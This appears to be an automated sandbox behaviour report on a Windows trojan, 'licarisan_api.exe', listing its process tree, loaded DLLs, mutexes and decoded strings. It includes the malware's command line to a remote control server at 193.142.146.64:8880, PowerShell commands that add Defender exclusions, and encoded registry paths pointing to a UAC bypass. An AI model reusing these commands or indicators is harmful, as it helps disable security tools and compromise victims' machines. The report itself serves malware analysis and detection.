                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007EF5A1
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007F018B
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007EED82
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007F125E
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007EEEF7
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007F1746
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007F0BD4
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007F3FC7
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007F07A9
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007F1394
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0080F2BE
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_008224CC
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0080F0E2
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007FD56A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Code function: 12_2_016063B9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Code function: 12_2_01609AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Code function: 12_2_01609ABF
                  Source: licarisan_api.exe, 00000000.00000002.1516311432.0000000000724000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameScreenShot.exe, vs licarisan_api.exe
                  Source: licarisan_api.exe, 00000000.00000002.1516311432.0000000000724000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameStub.exe" vs licarisan_api.exe
                  Source: licarisan_api.exe, 00000000.00000000.1260050152.00000000006C0000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameScreenShot.exe, vs licarisan_api.exe
                  Source: licarisan_api.exe, 00000000.00000002.1517624626.000000000250E000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameStub.exe" vs licarisan_api.exe
                  Source: licarisan_api.exe | Binary or memory string: OriginalFilenameScreenShot.exe, vs licarisan_api.exe
                  Source: licarisan_api.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, ZMYTFC94A7P9.csBase64 encoded string: 'YUhSMGNITTZMeTl5WVhjdVoybDBhSFZpZFhObGNtTnZiblJsYm5RdVkyOXRMMGR2WkU5bVYyRnlaVVpoY21VdlZHaGxSMjl2WkV0cFpGQm9iM1J2Y3k5dFlXbHVMM0owTG1wd1p3PT0='
Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, YGRKZZ70EYH6.cs | Base64 encoded string: (long base64 blob omitted)
Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, 2ZVQL0G981AF.cs | Base64 encoded string: 'VTI5bWRIZGhjbVZjVFdsamNtOXpiMlowWEZkcGJtUnZkM01nVGxSY1EzVnljbVZ1ZEZabGNuTnBiMjVjVjJsdWJHOW5iMjVj', 'VTI5bWRIZGhjbVZjVFdsamNtOXpiMlowWEZkcGJtUnZkM01nVGxSY1EzVnljbVZ1ZEZabGNuTnBiMjVjVjJsdWJHOW5iMjQ9', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVsbFxvcGVuXGNvbW1hbmQ=', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVsbFxvcGVuXGNvbW1hbmQ=', 'QzpcV2luZG93c1xTeXN0ZW0zMlxDb21wdXRlckRlZmF1bHRzLmV4ZQ==', 'VTI5bWRIZGhjbVZjVFdsamNtOXpiMlowWEZkcGJtUnZkM01nVGxSY1EzVnljbVZ1ZEZabGNuTnBiMjVjVjJsdWJHOW5iMjVj'
Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, 432UNQ7P4ZIK.cs | Base64 encoded string: 'U2VsZWN0ICogRnJvbSBXaW4zMl9Qcm9jZXNzIFdoZXJlIFBhcmVudFByb2Nlc3NJRD0=', 'U2VsZWN0ICogRnJvbSBXaW4zMl9Qcm9jZXNzIFdoZXJlIFBhcmVudFByb2Nlc3NJRD0='
Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, GLBIU47KBU1H.cs | Base64 encoded string: 'IC90YXJnZXQ6d2luZXhlIC9wbGF0Zm9ybTphbnljcHUgL29wdGltaXplKw=='
Source: classification engine | Classification label: mal100.troj.evad.winEXE@21/12@5/2
Source: C:\Users\user\Desktop\licarisan_api.exe | File created: C:\Users\user\Music\OcoulsUpdater
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Mutant created: \Sessions\1\BaseNamedObjects\vUiuCXqqM
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2104e5b.dcw.ps1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\explorer.exe
Source: unknown | Process created: C:\Windows\explorer.exe
Source: unknown | Process created: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\licarisan_api.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: licarisan_api.exe | ReversingLabs: Detection: 21%
Source: licarisan_api.exe | Virustotal: Detection: 33%
Source: C:\Users\user\Desktop\licarisan_api.exe | File read: C:\Users\user\Desktop\licarisan_api.exe
Source: unknown | Process created: C:\Users\user\Desktop\licarisan_api.exe "C:\Users\user\Desktop\licarisan_api.exe"
Source: C:\Users\user\Desktop\licarisan_api.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /NoUACCheck
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /NoUACCheck
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\licarisan_api.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
Source: C:\Users\user\Desktop\licarisan_api.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\licarisan_api.exe | Section loaded: k7rn7l32.dll
Source: C:\Users\user\Desktop\licarisan_api.exe | Section loaded: ntd3ll.dll
Source: C:\Users\user\Desktop\licarisan_api.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\licarisan_api.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: wldp.dll
Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe | Section loaded: ninput.dll
Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe | Section loaded: xmllite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe | Section loaded: profapi.dll
Source: C:\Windows\explorer.exe | Section loaded: edputil.dll
Source: C:\Windows\explorer.exe | Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe | Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe | Section loaded: slc.dll
Source: C:\Windows\explorer.exe | Section loaded: sppc.dll
Source: C:\Windows\explorer.exe | Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe | Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe | Section loaded: cscui.dll
Source: C:\Windows\explorer.exe | Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe | Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe | Section loaded: icu.dll
Source: C:\Windows\explorer.exe | Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.search.dll
Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe | Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe | Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe | Section loaded: profapi.dll
Source: C:\Windows\explorer.exe | Section loaded: edputil.dll
Source: C:\Windows\explorer.exe | Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe | Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe | Section loaded: slc.dll
Source: C:\Windows\explorer.exe | Section loaded: sppc.dll
Source: C:\Windows\explorer.exe | Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe | Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe | Section loaded: cscui.dll
Source: C:\Windows\explorer.exe | Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe | Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe | Section loaded: icu.dll
Source: C:\Windows\explorer.exe | Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.search.dll
Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe | Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
